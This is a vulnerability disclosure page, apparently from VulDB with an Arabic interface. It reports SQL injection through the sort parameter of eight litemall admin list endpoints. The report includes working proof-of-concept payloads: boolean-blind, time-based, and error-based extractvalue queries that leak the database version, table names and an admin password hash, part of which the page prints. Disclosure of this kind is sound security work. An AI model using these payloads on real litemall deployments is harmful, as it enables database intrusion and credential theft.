إرسال #811468: linlinjava litemall up to 1.8.0 SQL Injectionالمعلومات

عنوانlinlinjava litemall up to 1.8.0 SQL Injection
الوصفA vulnerability was found in linlinjava litemall up to 1.8.0(https://github.com/linlinjava/litemall). It has been rated as critical. This issue affects multiple admin controller list endpoints that are NOT covered by existing CVEs (CVE-2024-24323 covers AdminOrderController only, CVE-2024-46382 covers AdminGoodsController only). Affected endpoints: AdminAftersaleController (/admin/aftersale/list), AdminCommentController (/admin/comment/list), AdminFeedbackController (/admin/feedback/list), AdminTopicController (/admin/topic/list), AdminAdController (/admin/ad/list), AdminCouponController (/admin/coupon/list), AdminUserController (/admin/user/list), AdminStorageController (/admin/storage/list). All 37 MyBatis Mapper XML files use ${orderByClause} for dynamic ORDER BY: <if test="orderByClause != null">order by ${orderByClause}</if> The sort/order HTTP parameters are concatenated in Service classes: example.setOrderByClause(sort + " " + order); PoC 1 - Boolean-based blind (verified on MySQL 8.0.45 with real litemall database): GET /admin/aftersale/list?sort=IF(1=1,id,name)&order=asc -> sorted by id (first row id=1006002) GET /admin/aftersale/list?sort=IF(1=2,id,name)&order=asc -> sorted by name (first row id=1025005) Different results confirm injection. PoC 2 - Error-based extractvalue: sort=extractvalue(1,concat(0x7e,version(),0x7e)) -> Error: XPATH syntax error: '~8.0.45~' (version leaked) sort=extractvalue(1,concat(0x7e,(SELECT password FROM litemall_admin LIMIT 1),0x7e)) -> Error: '~$2a$10$.rEfyBb/GURD9P2p0fRg/OAJ' (admin password hash leaked) sort=extractvalue(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()),0x7e)) -> All table names leaked PoC 3 - Time-based blind: sort=IF(SUBSTRING(user(),1,1)='r',SLEEP(2),1) -> Response delayed ~8 minutes (confirms user starts with 'r') Reporter: berna ([email protected])
المصدر⚠️ https://gist.github.com/A1AAAAAAAAAA1/bc875f5be52b44b2e557c5312e355d47
المستخدم
 berna (UID 97558)
ارسال23/04/2026 04:41 PM (1 شهر منذ)
الاعتدال17/05/2026 11:36 AM (24 days later)
الحالةتمت الموافقة
إدخال VulDB364397 [linlinjava litemall حتى 1.8.0 Admin Endpoint حقن SQL]
النقاط20

التالي نظرة عامة السابق

Want to know what is going to be exploited?

We predict KEV entries!